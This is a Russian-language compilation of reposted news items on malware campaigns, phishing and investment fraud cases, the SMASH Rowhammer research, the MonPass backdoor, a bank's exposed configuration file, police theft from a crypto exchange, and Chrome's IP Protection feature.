Команда исследователей Check Point обнаружила, что мессенджер Telegram используется в качестве управляющего сервера для трояна удаленного доступа (RAT) ToxicEye. Даже когда Telegram не установлен или не используется, хакерам удается удаленно передавать команды малвари и совершать операции через приложение. За последние три месяца исследователи отследили более 130 таких кибератак.


Операторы ToxicEye распространяют свою малварь, маскируя ее под почтовые вложения. Получив доступ к системе жертвы и ее данным, они также получают возможность устанавливать на устройство другую малварь.
Как правило, атака происходит следующим образом.

Схема атаки
Исследователи отмечают, что использование Telegram – это весьма умный шаг, та
как ведь Telegram — это легитимный и простой в использовании сервис, который
обычно не блокируется корпоративными антивирусными решениями. Также это
позволяет преступникам оставаться анонимными, ведь для регистрации им
требуется только номер мобильного телефона.
«Мы настоятельно призываем организации и пользователей Telegram быть в курсе последних новостей о фишинговых атаках и относиться с большим подозрением к письмам, в тему которых встроено имя пользователя или организации, — комментирует Идан Шараби, менеджер группы исследований и разработок Check Point Software Technologies. — Учитывая, что Telegram можно использовать для распространения вредоносных файлов или как канал управления для вредоносного ПО, мы ожидаем, что в будущем злоумышленники продолжат разрабатывать инструменты, использующие эту платформу».
Click to expand...
Источник: xakep.ru/2021/04/23/toxiceye/
В январе 2021 года эксперты Google предупреждали, что северокорейские хакеры атакуют ИБ-специалистов, занимающихся исследованиями уязвимостей. К специалистам применяли социальную инженерию, пытались войти к ним в доверие, а в итоге заманить на вредоносные сайты и заразить их системы малварью.
Теперь в Google пишут, что эти атаки возобновились: был обнаружен сайт фейковой ИБ-фирмы SecuriElite, а также ее учетные записи в Twitter и LinkedIn, которые были созданы той же хакерской группой. Якобы фирма находится в Турции и занимается пентестами, оценкой безопасности ПО и эксплоитами.

Связать эту компанию с прошлыми атаками удалось благодаря использованию того же открытого ключа PGP.
Суд я по всему, злоумышленники действовали по старой схеме: планировали использовать аккаунты в социальных сетях для связи с ИБ-специалистами, чтобы заманить исследователей на свой сайт, где против них использовали бы эксплоиты для браузера и заражали бы их машины вредоносным ПО.
Тогда как во время первой волны атак использовались уязвимости нулевого дня в Google Chrome, Internet Explorer и Windows 10, новый сайт не содержал какого- либо вредоносного кода. В Google полагают, что операция была обнаружена еще на этапе планирования, и до эксплоитов дело дойти просто не успело.
Хотя сайт SecuriElite не был вредоносным на момент обнаружения, Google все равно добавила адрес сайта (securielite[.]com) в Safe Browsing API, чтобы пользователи не могли попасть на него даже случайно. Также эксперты уведомили социальные сети об учетных записях злоумышленников, которые теперь уже заблокированы.

Источник: xakep.ru/2021/04/01/securielite/
Правонарушителя разоблачили сотрудники отдела противодействия киберпреступлениям Сумщины совместно со следственным управлением областной полиции и работниками Сумского следственного изолятора.
33-летний фигурант, находясь под стражей, с мобильного телефона распространял вредоносное программное обеспечение. Для этого мужчина в Интернете создавал объявления о продаже несуществующих товаров. Потенциальному покупателю предлагал перейти в мессенджер для обсуждения деталей сделки. В переписку злоумышленник насылал архивный файл, в котором было зашифровано вредоносное программное обеспечение. Архив маскировал под каталог товаров.
После попадания на устройство "вирус" собирал авторизационные данные к онлайн- банкингу. В дальнейшем злоумышленник выводил деньги потерпевших на подконтрольный счет.
В ходе обыска в камере осужденного полицейские изъяли мобильные телефоны, содержащие доказательства причастности к правонарушению. Сумма ущерба устанавливается.
Открыто уголовное производство по ч. 1 ст. 361-1 (Создание с целью использования, распространения или сбыта вредоносных программных или технических средств, а также их распространения или сбыт), ч. 1 ст. 361 (Несанкционированное вмешательство в работу компьютеров, автоматизированных систем, компьютерных сетей или сетей электросвязи, ч. 3 ст. 190 (шахтеров). Решается вопрос об объявлении ему подозрения.
Злоумышленники получали данные о банковских картах граждан ЕС и присвоили более 2,5 млн грн. Мошенническую деятельность киберполицейские и следователи Нацполиции пресекли в рамках международной полицейской операции. Сейчас расследование завершено и обвинительный акт направлен в суд.
Весной 2023 года киберполицейские совместно с Главным отделом контрразведывательной защиты интересов государства в информационной сфере СБУ в Харьковской области и следователями Главного следственного управления Нацполиции под процессуальным руководством Офиса Генерального прокурора, в сотрудничестве с правоохранителями Чехии разоблачили участников международной преступной группировки.
Часть фигурантов, проживающих на территории Украины, создали фишинговые сайты, ориентированные на европейских пользователей. На вебресурсах предлагали различные товары по ценам ниже рыночных. Данные банковских карт, которые клиенты указывали на таких ресурсах для оплаты заказов, автоматически становились известны злоумышленникам. В дальнейшем они присваивали деньги со счетов жертв.
К работе в call-центрах в Виннице и во Львове злоумышленники привлекли операторов, задача которых заключалась в убеждении клиентов совершить покупки.
Правоохранители провели более 30 обысков в домах фигурантов, их автомобилях и по местам расположения call-центров. Изъяты мобильные телефоны, SIM-карты и компьютерная техника, которые использовались в противоправной деятельности.
В рамках расследования в Украине были задержаны и избраны меры пресечения двум организаторам мошеннической схемы и исполнителю. Также на территории Евросоюза задержаны еще 10 участников преступной группы.
В рамках расследования следователи Главного следственного управления Национальной полиции Украины доказали причинение более 2,5 млн грн убытков десяткам пострадавших, среди которых - граждане Чехии. В июне 2024 года полицейские завершили досудебное расследование.
В отношении трех участников группировки правоохранители направили в суд обвинительный акт по ч. 1, 2 ст. 255 (Создание, руководство преступным сообществом или преступной организацией, а также участие в ней) и ч. 4 ст. 28 ч. 4 ст. 190 (Мошенничество) Уголовного Кодекса Украины. Им грозит до двенадцати лет лишения свободы с конфискацией имущества.
Материалы в отношении пострадавших из Польши, Франции, Испании, Португалии и других стран Европы выделены в отдельное уголовное производство. Продолжаются следственные действия с целью документирования других эпизодов преступной деятельности и установления возможных сообщников обвиняемых.
В северной Мьянме вооруженное объединение «Альянс трех братств» (Three Brotherhood Alliance), состоящее из представителей трех этнических групп, объявило о начале военной операции в городе Лауккайнг на границе с Китаем.
Город находится в северо-восточной части Мьянмы, в штате Шан, который граничит с Китаем. В регионе довольно напряженная политическая обстановка. Она обусловлена присутствием различных вооруженных группировок и длительными этническими конфликтами, а также высоким уровнем преступности (в связи с беспорядками в обществе).
Лауккайнг также известен как ключевой центр кибермошенничества, и его деятельность вызывает серьезные опасения у Пекина.
В официальном заявлении Альянс рассказывает о своих планах: «С целью полного искоренения интернет-мошенничества, а также ликвидации преступных центров и их опорных пунктов по всей стране, в том числе в приграничных районах между Китаем и Мьянмой, мы решили совместно осуществить эту военную операцию». Одной из главных задач группировки является борьба с распространением так называемой схемы pig butchering (разделывание свиньи), которая стала крупной международной проблемой.
Pig butchering — это вид кибермошенничества, при котором жертв «откармливают» обещаниями большой прибыли, подобно тому, как откармливают свинью перед забоем. Злоумышленники долгое время наращивают доверие своих целей (обычно через переписку в интернете), прежде чем обмануть их на крупные суммы денег и исчезнуть.
В Коканге, районе штата Шан, который населяют этнические китайцы, такие схемы являются значительным источником дохода. Здесь организованная преступность долгое время процветала, и до недавнего времени к ней относились снисходительно.
Однако в последнее время правительство Китая начало активно давить на власти Мьянмы, чтобы пресечь эту деятельность, поскольку жертвами часто становятся сами китайцы.
Согласно отчетам ООН, в мошенническую активность в Мьянме было вовлечено около 120 000 человек. Это связано не только с безобидными кибератаками, но и с индустрией настоящей работорговли в даркнете. Жертвы, привлекаемые фальшивыми объявлениями о работе, оказываются запертыми в лагерях, где киберпреступники вовлекают их в свою незаконную деятельность.
С того момента, как началась операция, «Альянс Трех Братств» успешно захватил значительные территории, включая ключевые пограничные города. Из захваченных лагерей были освобождены сотни жертв торговли людьми.
В воскресенье правительство Таиланда вернуло на родину 266 своих граждан, 6 филиппинцев и 1 гражданина Сингапура.
Миссия Альянса отражает усилия как местных, так и международных сил в борьбе с кибермошенничеством, ставшим глобальной критической угрозой на глобальном уровне.
source: mp.weixin.qq.com/s/2U9ctBeR46rj-7BlykBeDg?fbclid=IwAR1mXCg2ckcKXUbM0mLWuY5PtWqmxXVkY3aognJu625Whwj7KNyZQfPpbR0
На данный момент из российского AppStore пропала вся экосистема "ВКонтакте", в
которую входит: VK, VK MUSIC, MAILRU и другие приложения.
Никаких комментариев от администрации экосистемы нет, в AppStore при попытке
установить обновление пишет, что приложение удалено разработчиком.
Как стало известно “Ъ”, правоохранительные органы разоблачили преступную группу, которая за четыре года под видом оказания разного рода финансовых услуг похитила у клиентов миллиарды рублей. Офисы ООО «Международный Финансовый Центр», ООО «Академия Управления Финансами и Инвестициями», ООО «Высшая Школа Управления Финансами» и ООО «Глобал Финанс» арендовали практически во всех небоскребах в «Москва-Сити» и крупных бизнес-центрах столицы. Сейчас под стражей и домашним арестом находятся несколько руководителей и менеджеров этих структур.
Уголовное дело об особо крупном мошенничестве (ч. 4 ст. 159 УК РФ) было возбуждено УВД по Юго-Западному округу ГУ МВД России по Москве 11 июля 2018 года по заявлениям нескольких пострадавших. Последние сообщили, что у них под видом инвестиционной деятельности было похищено несколько десятков миллионов рублей. Долгое время расследование велось в отношении неустановленных лиц, не раз приостанавливалось и снова возобновлялось. С мертвой точки расследование сдвинулось лишь в прошлом году, после того как им занялся Следственный комитет России, объединивший в одно производство сразу несколько уголовных дел. На данный момент в материалах, по данным “Ъ”, фигурируют не менее 250 потерпевших от деятельности ООО «Международный Финансовый Центр» (МФЦ), ООО «Академия Управления Финансами и Инвестициями» (АУФИ), ООО «Высшая Школа Управления Финансами» (ВШУФ) и ООО «Глобал Финанс». При этом у следствия есть основания полагать, что все эти компании и их менеджмент связаны друг с другом.
Ущерб же в материалах дела пока обозначен вполне стандартной в таких случаях формулировкой «более 1 млн руб.», которая позволяет квалифицировать его как «особо крупный».
При этом, как утверждают сами потерпевшие, на самом деле количество пострадавших от действий предполагаемых мошенников может исчисляться тысячами, но одни просто по каким-то причинам не стали обращаться в полицию, а другие пытаются добиться возвращения денег через различные юридические компании или суд. При этом участники расследования полагают, что сумма похищенных у инвесторов денег может составлять несколько миллиардов.
Схема работы у всех фигурирующих в уголовном деле компаний была примерно одинаковая. Клиентов подыскивали путем просто обзвона по купленным базам данных. Сначала потенциальным жертвам предлагали абсолютно бесплатные консультации в области инвестирования. Для этого надо было посетить один из презентабельных офисов, которые фирмы арендовали в ряде башен в «Москва-Сити», а также бизнес-центрах на Валовой и Лесной улицах. Там с будущими вкладчиками заключали договор на оказание безвозмездных услуг по сбору разного рода финансовой информации, на основании которой им и предлагалось инвестировать средства, например, в покупку акций, облигаций или операции по купле-продаже валют на рынке Forex.
При этом, по материалам дела, менеджеры фирм демонстрировали некие выкладки, из которых следовало, что прибыль будет не менее 12–18% в месяц.
Чаще же всего договор предлагалось заключить на консультационные услуги при открытии «личного кабинета» у того или иного брокера. Например, ВШУФ в качестве такового предлагала зарегистрированную на Маршалловых Островах компанию Bristol House Corporation, которая, как установили правоохранители, является лжеброкером и не имеет лицензий на право оказания финансовых услуг ни в одной стране мира.
При этом фиктивный счет и «личный кабинет» клиенту менеджеры открывали прямо в офисе ВШУФ. Там же кассир принимал деньги, которые вносились на мнимый брокерский счет. Впоследствии, по данным следствия, инвесторам демонстрировали, как стремительно растет их доход, предлагая сделать дополнительные вложения. Проблемы у вкладчиков начинались, как обычно в таких случаях, когда они пытались вывести деньги со своего счета. Сначала, говорится в деле, клиенту в этом отказывали под самыми различными предлогами, например, сообщали, что средства попали под санкции. А потом выяснялось, что акции, в которые были вложены деньги, якобы внезапно рухнули.
В декабре прошлого года бывший гендиректор ВШУФ Виталий Фидуров по обвинению в мошенничестве был отправлен Хамовническим райсудом Москвы под домашний арест. Кстати, до 2017 года господин Фидуров возглавлял весьма далекое от инвестиционной деятельности ООО «Септик на дачу».
Что касается МФЦ и «Глобал Финанс», то они, по данным следствия, под видом консультаций и обучения финансовой грамотности рекомендовали своим клиентам иметь дело с дилером Global FX. Последний же предлагал выход на межбанковский рынок и операции с валютой (Forex), акциями и другими инструментами. При этом лицензией Центробанка эта компания также не обладает.
Несколько менеджеров ООО «Глобал Финанс» сейчас находятся под стражей. Отметим, что задержали их одновременно с гендиректором АУФИ Арсением Дадашевым, компания которого также предлагала гражданам вкладывать свои средства в якобы весьма прибыльные кейсы.
Как утверждают потерпевшие, деньги у них принимали не через банк, а прямо в офисе АУФИ наличными, которые затем переводили в доллары, а те — в криптовалюту, которую якобы отправляли брокеру Asset Capital Business, зарегистрированному на тех же Маршалловых Островах.
В отношении кассира АУФИ Снежаны Запорожец суд ограничился мерой пресечения в виде запрета определенных действий.
В итоге, как выяснили следователи, вышеперечисленные компании, «не имея соответствующей лицензии, обещая быстрое извлечение прибыли от сотрудничества, создавали лишь видимость ведения брокерской деятельности, а получаемые от клиентов деньги похищались».
source: kommersant.ru/doc/5862207
Ученые из Амстердамского свободного университета и Швейцарской высшей технической школы Цюриха разработали новую вариацию атаки Rowhammer и дали ей название SMASH (Synchronized MAny-Sided Hammering). Эту атаку можно использовать посредством JavaScript и браузера, и она опасна даже для современной памяти DDR4.
Напомню, что оригинальную атаку Rowhammer еще в 2014 году придумали исследователи из университета Карнеги-Меллона. Ее суть сводилась к тому, что определенное воздействие на ячейки памяти может привести к тому, что электромагнитное излучение повлияет на соседние ячейки, и значения битов в них изменятся.
Изначально атаки Rowhammer работали только локально, но к 2016 году методика была усовершенствована, и Rowhammer приспособили для удаленной работы с использованием JavaScript (к примеру, в браузере). В целом перед Rowhammer может быть уязвима память DDR3 и DDR4, а также атаку успели приспособить против Microsoft Edge и виртуальных машин Linux. Существует даже вариация Rowhammer, представляющая опасность для устройств на Android, а эффективность атак научились повышать при помощи видеокарт.
Конечно, современная память использует в качестве защиты Target Row Refresh (TRR) — комбинацию различных программных и аппаратных исправлений, созданных за прошедшие годы. Но в прошлом году исследователи уже предупреждали о том, что TRR можно обойти локально и демонстрировали атаку TRRespass.
Теперь специалисты Амстердамского свободного университета и Швейцарской высшей технической школы Цюриха представили атаку SMASH, развивающую идеи TRRespass. То есть новый метод тоже нацелен на обход TRR, но теперь уже удаленно – посредством JavaScript и браузера. Исследователи с сожалением констатируют, что многие современные модули DDR4 по-прежнему уязвимы перед Rowhammer.
Эксперты показали на видео, как SMASH может медленно осуществлять произвольное чтение и запись в память, используя Firefox (81.0.1) и Ubuntu 18.04 с ядром Linux 4.15.0-111-generic. Потенциально это может привести к выполнению вредоносного кода, и специалисты утверждают, что таким образом могут «полностью скомпрометировать браузер Firefox за 15 минут».
«Наша работа подтверждает, что проблема Rowhammer продолжает угрожать пользователям интернета. Что еще хуже, наше исследование механизмов синхронизации показывает, что злоумышленник имеет даже больший контроль, чем предполагалось ранее. То есть построить надлежащую защиту от Rowhammer, в которой мы нуждаемся, пока проблема актуальна, будет еще сложнее», — говорят авторы SMASH.
Click to expand...
Источник: xakep.ru/2021/04/16/smash/
Компания Avast [опубликовала результаты](https://decoded.avast.io/luigicamastra/backdoored-client-from- mongolian-ca-monpass/) исследования компрометации сервера монгольского удостоверяющего центра MonPass, которая привела к подстановке бэкдора в приложение, предлагаемое для установки клиентам. Анализ показал, что инфраструктура была скомпрометирована через взлом одного из публичных web- серверов MonPass на базе платформы Windows. На указанном сервере были выявлены следы восьми разных взломов, в результате которых было установлено восемь webshell и бэкдоров для удалённого доступа.
В том числе вредоносные изменения были внесены и в официальное клиентское ПО, которое поставлялось с бэкдором с 8 февраля по 3 марта. История началась с того, что в ответ на жалобу клиента компания Avast убедилась в наличии вредоносных изменений в распространяемом через официальный сайт MonPass инсталляторе. После уведомления о проблеме, сотрудники MonPass предоставили Avast доступ к копии дискового образа взломанного сервера для разбора инцидента.
Команда проекта связалась с злоумышленниками и предложила награду за возврат средств
Хакеры взломали DeFi-проект Qubit Finance и вывели из его пула средства приблизительно на $80 млн, сообщила компания по кибербезопасности и аудиту PeckShield. Представители проекта подтвердили факт взлома и рассказали, что отслеживают похищенные средства, а также связались со злоумышленниками и предложили «максимальную награду».
«Хакер выпустил неограниченное количество токенов xETH, которые были использованы в качестве залога для займа в сети Binance Smart Chain. На данный момент команда с партнерами работает над следующими шагами», — говорится в заявлении Qubit Finance.
После взлома проекта цена его токена упала на 25%, до текущих отметок около $0,004, по данным CoinGecko. Криптовалюта торгуется на 99% ниже исторического максимума в $0,58, который был установлен в сентябре прошлого года.
Braza Bank под угрозой кибератак
Исследователи обнаружили, что Braza Bank оставил публично доступным файл конфигурации окружения (.env), содержащий конфиденциальную информацию, такую как пароли и ключи API, которые могли помочь злоумышленникам в атаке на банк.
Файл .env хранит важные данные для работы системы, и его защита является ключевой для безопасности. К сожалению, Braza Bank не обеспечил надлежащую защиту, и файл был доступен в интернете целых десять месяцев.
Под угрозой оказались:
- Электронная почта и службы связи
- API и серверные службы
- Службы push-уведомлений
- Облачное хранилище и доступ к данным
- Службы аутентификации и авторизации
С утечкой учетных данных злоумышленники могут использовать системы банка для несанкционированного доступа к конфиденциальной информации клиентов, нарушать работу сервисов и вызывать утечки данных.
Атакующие также могут использовать системы электронной почты и уведомлений для фишинга или спама, манипулировать процессами аутентификации для выдачи себя за пользователей или получить доступ к чувствительным данным, хранящимся в облачных хранилищах.
Утекли следующие конфиденциальные данные:
- AWS Cognito: идентификатор клиента, секрет клиента и идентификатор пула
пользователей
- OneSignal: идентификатор приложения и ключ
- PEAR Mail: SMTP-хост, адрес электронной почты и пароль
- Single Sign-On (SSO): точка авторизации, идентификатор клиента, тип ответа
и область
- AWS S3: регион и имя хранилища
- Детали API-эндпоинтов
- Разные конфигурационные данные: флаги для обхода аутентификации, коды
профилей, ключ журнала аутентификации
“Утечка файла конфигурации представляет серьезные риски в нескольких критических областях. Это может повлиять на службы аутентификации и авторизации, а также на системы электронной почты и связи. Кроме того, скомпрометированные API, серверные службы и облачные хранилища могут предоставить несанкционированный доступ к конфиденциальным данным,” — объяснили исследователи Cybernews.
“Утекшая информация может позволить злоумышленникам воспользоваться уязвимостями системы. Поэтому важно всегда защищать конфигурационные файлы, чтобы предотвратить утечки данных и несанкционированный доступ,” добавили они.
Такое раскрытие может не только навредить репутации банка и подорвать доверие клиентов, но и поставить пользователей под серьезный финансовый и личный риск.
Cybernews связался с Braza Bank, который оперативно закрыл доступ к файлу конфигурации. В официальном заявлении компания сообщила, что внутренние данные не пострадали. Они утверждают, что проверили утекшие учетные данные и обнаружили, что они “уже устарели или не имели достаточных прав для причинения вреда.”
“Мы добавили новые меры кибербезопасности и улучшили наши внутренние процессы для предотвращения подобных ситуаций,” — сообщил представитель компании.
Как стало известно «Ъ», в Москве до суда дошло уголовное дело бывших столичных полицейских — следователя Антонины Шакиной и оперативников бюро специальных технических мероприятий (БСТМ) Рената Бахтиева и Леонида Голубева. Их обвиняют в хищении средств клиентов из расположенной в «Москва-Сити» криптовалютной биржи Garantex по поддельным решениям Басманного суда столицы. В ходе следствия вину частично признала лишь Антонина Шакина.
Старший следователь следственного отдела ОМВД России по Басманному району столицы Антонина Шакина, а также старшие оперуполномоченные 11-го отдела БСТМ ГУ МВД России по Москве Ренат Бахтиев и Леонид Голубев были задержаны в октябре 2023 года и заключены под стражу. Вместе с ними в СИЗО оказалась жительница Элисты Лилия Элешова. Всем четверым Мещанский межрайонный следственный отдел Следственного комитета РФ предъявил обвинение в мошенничестве в особо крупном размере (ч. 4 ст. 159 УК РФ), а полицейским Антонине Шакиной и Ренату Бахтиеву — также в покушении на мошенничество (ч. 3 ст. 30, ч. 4 ст. 159 УК РФ) и четырех эпизодах подделки документов (ч. 1 ст. 327 УК РФ).
По данным СКР, четверка участвовала в реализации схемы, которую разработал бывший сотрудник МВД Роман Морев.
Первыми жертвами силовиков осенью 2022 года стали клиенты криптовалютной биржи Garantex — житель Тверской области Михаил Корнийчук и житель Подмосковья Агакерим Гамзабеков. Как говорится в материалах расследования, злоумышленники сначала решили узнать, какие суммы цифровых денег хранятся у них в криптокошельках. Для этого оперативник Леонид Голубев, по данным следствия, в конце ноября 2022 года направил на биржу с рабочего компьютера служебный запрос якобы в рамках проверки, «которая в действительности проводилась по другому факту и основанию».
А 7 декабря жительница Элисты Лилия Элешова приехала в ОВД «Басманный» и написала заявление о том, что у нее якобы похитили деньги, размещенные на бирже Garantex (юридическое наименование ООО «Корпорация Финтех»). Женщина также подписала заранее написанный для нее следователем Антониной Шакиной протокол допроса в качестве потерпевшей. После этого Антонина Шакина, согласно версии следствия, составила липовое постановление о возбуждении уголовного дела, в рамках которого вместе с оперативником Ренатом Бахтиевым изготовила фиктивное постановление судьи Басманного суда Евгении Николаевой.
Согласно фальшивке, 9 декабря 2022 года якобы был наложен арест на имущество — аккаунты господ Корнийчука и Гамзабекова на Garantex.
После того как полицейский Ренат Бахтиев отправил поддельный документ сотруднице службы безопасности биржи, следователь Антонина Шакина 19 декабря вынесла постановление о снятии ареста с данного имущества и о необходимости перечисления активов на аккаунт Лилии Элешовой. В тот же день следователь отправила свое постановление на электронный адрес биржи.
А спустя несколько дней, 26 декабря, мнимая потерпевшая Лилия Элешова приехала в офис Garantex на Пресненскую набережную в «Москва-Сити» и обналичила перекочевавшие к ней деньги — принадлежавшие господину Корнийчуку 870 тыс. 478 руб., а также 75,637 тыс. USDT (5,328 млн руб. по курсу того времени) и 126 руб., принадлежавшие господину Гамзабекову. В дальнейшем она передала деньги, в общей сложности 6,2 млн руб., соучастникам преступления.
Как выяснило следствие, аналогичным способом Ренат Бахтиев совместно с Антониной Шакиной планировали похитить 24,8 млн руб. с депозитного счета биржи жителя Санкт-Петербурга Александра Сазонова. Роль потерпевшего в этот раз, по версии следствия, решили возложить на бывшего сотрудника 11-го отдела БСТМ ГУ МВД России по Москве Дениса Потапкина, который, как считают в СКР, предоставил оперативнику Ренату Бахтиеву для этой цели свои паспортные данные. На этот раз сообщники вновь изготовили поддельное постановление об аресте имущества господина Сазонова от имени другой судьи Басманного суда — Валентины Левашовой, датированное 18 января 2023 года, а также постановление следователя Антонины Шакиной о снятии ареста с имущества от 6 февраля.
При этом решение судьи сообщникам пришлось переделывать дважды, так как в первом они допустили ошибку в адресе депозитного счета господина Сазонова. 20 февраля 2023 года принадлежавшие потерпевшему Александру Сазонову 296,861 USDT (22,6 млн руб. по курсу того времени) и 2 млн 180 тыс. руб. были переведены на аккаунт Дениса Потапкина. Однако обналичить деньги сообщники не успели, так как потерпевший обратился в правоохранительные органы, и биржа заморозила средства.
В ходе следствия из четырех фигурантов вину частично признала Антонина Шакина, псевдопотерпевшая Лилия Элешова согласилась с обвинением полностью, а бывшие оперативники БСТМ Ренат Бахтиев и Леонид Голубев продолжают настаивать на своей невиновности.
Что же касается Романа Морева и Дениса Потапкина, то в отношении них уголовные дела выделены в отдельное производство, оба объявлены в международный розыск — по данным следствия, они скрываются за границей.
Представляющий интересы потерпевшего Александра Сазонова адвокат Игнат Лихунов рассказал «Ъ», как злоумышленники находили жертв. «Они отслеживали крупные трансакции в криптовалюте на счетах граждан, после чего за дело принимались сотрудники МВД, дело которых сейчас рассматривается в суде»,— сказал адвокат. Он отметил, что в ходе следствия на адвокатов потерпевших оказывалось серьезное давление, однако, несмотря на это, дело все же удалось довести до суда. «Благодаря достойной работе оперативников службы "М" ФСБ, собственной безопасности МВД и следователей СКР Москвы было вскрыто целое осиное гнездо по хищению средств с криптовалютной биржи Garantex»,— подчеркнул господин Лихунов.
Разбирательство по существу дела начнется в Пресненском райсуде Москвы на следующей неделе.
• Source: https://www.kommersant[.]ru/doc/6903562
Следователи и киберполицейские установили, что преступную схему по получению доступа к банковским счетам граждан реализовали юноши в возрасте 16 и 17 лет. Для этого они использовали фишинговые ссылки, которые распространяли в чатах социальных сетей.
Среди обманутых - жители разных регионов страны, в том числе и работники одного из детских домов Сумщины. Все они получали онлайн-предложения по оказанию международной помощи. Перейдя по распространенному ссылку, им предлагалось ввести логин и пароль, якобы для входа в виртуальный кабинет банка. После такой авторизации они теряли средства со счетов.
Юные «бизнесмены» за часть полученных доходов покупали самые современные мобильные телефоны, а позже продавали их. Кроме того, молодые люди приобрели авто, оформив право собственности на своих родителей.
Мошенническую схему разоблачили киберполицейские Житомирщины совместно с СБУ, при содействии службы безопасности АО КБ «ПриватБанк».
29 мая полицейские провели 11 санкционированных обысков по местам жительства причастных в Житомире, Бердичеве, в их транспортных средствах, а также в Винницкой области. Полицейские изъяли мобильные телефоны, банковские карты, компьютерную технику, жесткие диски, черновые записи и более 20 тысяч гривен.
Следователи ГУНП в Житомирской области, под процессуальным руководством областной прокуратуры, сообщили юношам о подозрениях в мошенничествах (ч. 4 ст. 190 Уголовного кодекса Украины).
По предварительным оценкам, общая сумма убытков может достигать более миллиона гривен. В рамках досудебного расследования продолжается установление других вероятных участников схемы.
Фигурантам мошеннической сделки может грозить до 8 лет лишения свободы.
Отдел коммуникации полиции Житомирской области.
• Source: [https://zt.npu.gov.ua/news/kryminal...okh-zhyteliv-zhytomyrshchyny- u-shakhraistvakh](https://zt.npu.gov.ua/news/kryminalnyi-iunatskyi-startap- politseiski-vykryly-trokh-zhyteliv-zhytomyrshchyny-u-shakhraistvakh)
В чемпионате России по спортивному программированию участвовали более 160 команд из разных регионов. В финал прошли только 38. Лучшим в дисциплине «программирование систем информационной безопасности» стал ИТМО: команда университета быстрее всех решила задания и заняла первое место. Второе и третье места завоевали участники из Республики Татарстан и Москвы. Победители разделили призовой фонд в размере более 1 млн руб. Об этом CNews сообщили представители ИТМО.
Чемпионат проходил в несколько этапов. В онлайн-отборе с 31 октября по 5 ноября состязались 162 команды. В очный финал прошли только 38, которые лучше справились с заданиями по программированию, обратной разработке и другим направлениям практико-ориентированной кибербезопасности.
Спортсмены соревновались в трех дисциплинах: программирование алгоритмическое, программирование продуктовое и программирование систем информационной безопасности. Лучшей в дисциплине «программирование систем информационной безопасности» стала команда из ИТМО. В ее состав вошли выпускник, доцент, студенты бакалавриата и магистратуры факультета безопасности информационных технологий: Артем Павлов, Александр Менщиков, Артем Насонов, Георгий Геннадьев, Никита Челноков, Герман Риттер и Дмитрий Сибирцев. Всего за лидерство в рамках этой дисциплины боролись 10 команд из разных регионов.
Участникам нужно было на скорость решить восемь заданий: например, написать или улучшить специальный код для перебора вариантов, разработать новое программное решение. Команда из ИТМО набрала 761 балл за семь из восьми решенных заданий. Это на 113 баллов больше, чем команда из Татарстана, и на 117 — чем команда из Москвы. Тройка лидеров разделила призовой фонд в размере более 1 млн руб.
«Наш факультет уже не первый год — один из лидеров в подготовке высококвалифицированных специалистов по информационной безопасности. Также благодаря нам было создано профессиональное сообщество, которое выходит далеко за рамки университета. Мы организуем всероссийские и международные соревнования CTF и олимпиады, у нас есть CTF-клуб. Причем и для школьников, и студентов, и профессионалов. Такой комплексный подход — фундамент наших побед и достижений», — сказал Данил Заколдаев, декан факультета безопасности информационных технологий ИТМО.
Компания Google [готовится](https://groups.google.com/a/chromium.org/g/blink- dev/c/9s8ojrooa_Q) приступить к тестированию новой функции «Защита IP» (IP Protection) в браузере Chrome. Это решение должно повысить конфиденциальность пользователей за счет маскировки их IP-адресов с помощью прокси-серверов самой Google. Компания планирует протестировать «Защиту IP» между релизом Chrome 119 и Chrome 225.
Разработчики объясняют, что IP-адреса позволяют сайтам и онлайн-сервисам отслеживать действия пользователей и помогают формировать постоянные профили людей. В Google считают, что это создает серьезные проблемы для конфиденциальности, поскольку, в отличие от сторонних cookies, в настоящее время у пользователей нет прямого способа отказаться и избежать такой скрытой слежки.
При этом IP-адреса используются и для выполнения таких важнейших функций, как маршрутизация трафика и борьба с мошенничеством. Специалисты Google уверены, что IP Protection не помешает этому, направляя сторонний трафик с определенных доменов через прокси-серверы и делая IP-адреса пользователей невидимыми именно этих доменов.
Планируется, что по мере развития экосистемы IP Protection будет адаптироваться для защиты пользователей от межсайтового отслеживания, и к проксируемому трафику будут добавляться дополнительные домены.
«В [команде] Chrome вновь возникло предложение по защите пользователей от межсайтовой слежки по IP-адресам. Это предложение представляет собой прокси- сервер, анонимизирующий IP-адреса для квалифицированного трафика», — пишут разработчики.
Click to expand...
Так, на начальном этапе защита IP-адресов будет осуществляться по желанию пользователя, что позволит людям контролировать настройки конфиденциальности, а Google сможет отслеживать тенденции.
Внедрение новой функции будет происходить поэтапно, с учетом региональных особенностей. На начальном этапе функция будет затрагивать только определенные домены в контексте третьих лиц, что позволит выявить тех, кто, по мнению пользователей, шпионит за ними.
На первом этапе, обозначенном как «Фаза 0», Google будет проксировать запросы только для собственных доменов с помощью проприетарного прокси-сервера. Это позволит компании протестировать инфраструктуру и даст разработчикам время для доработки списка доменов. Среди доменов, на которых Google намерена тестировать эту функцию, присутствуют такие платформы компании, такие как Gmail и AdServices.
В ходе нулевой фазы доступ к прокси-серверам смогут получить только пользователи, вошедшие в Google Chrome с IP-адресом в США. Это предварительное тестирование будет проводиться для избранной группы, отобранной автоматически, но планируется, что архитектура и дизайн системы будут изменяться по мере проведения тестов.
Для предотвращения возможных злоупотреблений сервер аутентификации, работающий под управлением Google, будет раздавать токены доступа к прокси-серверу, устанавливая квоту для каждого пользователя.
В рамках следующих этапов Google планирует использовать двуххоповую систему прокси для дальнейшего повышения конфиденциальности.
«Мы рассматриваем возможность использования двух хопов для повышения уровня конфиденциальности. Второй прокси будет управляться внешней CDN, в то время как Google будет управлять первым хопом, — гласит пояснительная документация IP Protection. — Это гарантирует, что ни один прокси-сервер не сможет видеть одновременно IP-адрес клиента и пункт назначения. CONNECT и CONNECT-UDP поддерживает цепочку прокси».
Click to expand...
Поскольку многие онлайн-сервисы используют GeoIP для определения местоположения пользователя при предоставлении услуг, Google планирует назначать прокси-соединениям IP-адреса, которые отображают лишь примерное, а не точное местоположение пользователя.
[](https://xakep.ru/wp- content/uploads/2023/10/439588/chrome-geo-ip-boundaries.jpg)
При этом в Google признают, что реализация IP Protection может быть сопряжена с некоторыми проблемами из области кибербезопасности. Так, поскольку трафик будет проходить через серверы Google, это может затруднить блокирование DDoS- атак или выявление нежелательного трафика.
Кроме того, если один из прокси-серверов Google окажется взломан, то хакер получит возможность «видеть» весь проходящий через него трафик и манипулировать им.
